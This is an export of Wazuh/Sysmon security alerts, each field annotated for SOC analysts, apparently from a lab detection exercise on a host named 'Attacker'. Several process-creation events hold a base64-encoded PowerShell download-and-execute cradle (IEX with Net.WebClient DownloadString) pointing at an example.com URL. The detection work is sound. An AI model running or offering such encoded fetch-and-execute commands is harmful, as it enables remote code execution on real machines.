No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:39.228 ProcessGuid: {94294ddc-bcf4-680a-eb0a-000000000e00} ProcessId: 14892 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_yre4dc4i.koa.ps1 CreationUtcTime: 2025-04-24 22:36:39.228 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:39.228
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcf4-680a-eb0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yre4dc4i.koa.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:39.228
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:05.916+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:05.916+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  37
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534225.1228555
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:41.9715607Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283043
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:40.440 ProcessGuid: {94294ddc-bcf8-680a-f10a-000000000e00} ProcessId: 9540 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcf4-680a-eb0a-000000000e00} ParentProcessId: 14892 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:40.440
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcf8-680a-f10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9540
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcf4-680a-eb0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:05.930+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:05.930+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  41
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534225.1236622
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:42.2552313Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283045
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:36:42.217 ProcessGuid: {94294ddc-bcf8-680a-f10a-000000000e00} ProcessId: 9540 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_z1i14jqk.z5t.ps1 CreationUtcTime: 2025-04-24 22:36:42.217 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:42.217
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcf8-680a-f10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9540
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_z1i14jqk.z5t.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:36:42.217
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from passed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from passed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:37:06.008+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:06.008+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.: Status changed from passed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19012
Numeric ID of the detection rule that fired.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['2.3.10.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534226.1239387
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26042
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Network access: Allow anonymous SID/Name translation' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines whether an anonymous user can request security identifier (SID) attributes for another user, or use a SID to obtain its corresponding user name. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  If this policy setting is enabled, a user with local access could use the well-known Administrator's SID to learn the real name of the built-in Administrator account, even if it has been renamed. That person could then use the account name to initiate a password guessing attack.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Windows Settings\Security Settings\Local Policies\Security Options\Network access: Allow anonymous SID/Name translation
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  2.3.10.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \\"LSAAnonymousNameLookup\\").ToString().Split(\\"=\\")[1].Trim()"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS, FAIL or NOT APPLICABLE. Red = needs fixing; "not applicable" means the check could not be evaluated on this run (the reason field below says why).

data.sca.check.reason:  Timeout overtaken running command 'powershell "$null = secedit /export /cfg $env:temp/secexport.cfg; $(gc $env:temp/secexport.cfg | Select-String \"LSAAnonymousNameLookup\").ToString().Split(\"=\")[1].Trim()"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  passed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:37:06.548+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:37:06.548+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  38
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534226.1243086
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:36:44.5117007Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  283086
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:36:43.206 ProcessGuid: {94294ddc-bcfb-680a-f30a-000000000e00} ProcessId: 13808 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcf8-680a-f10a-000000000e00} ParentProcessId: 9540 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:36:43.206
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcfb-680a-f30a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13808
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcf8-680a-f10a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9540
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

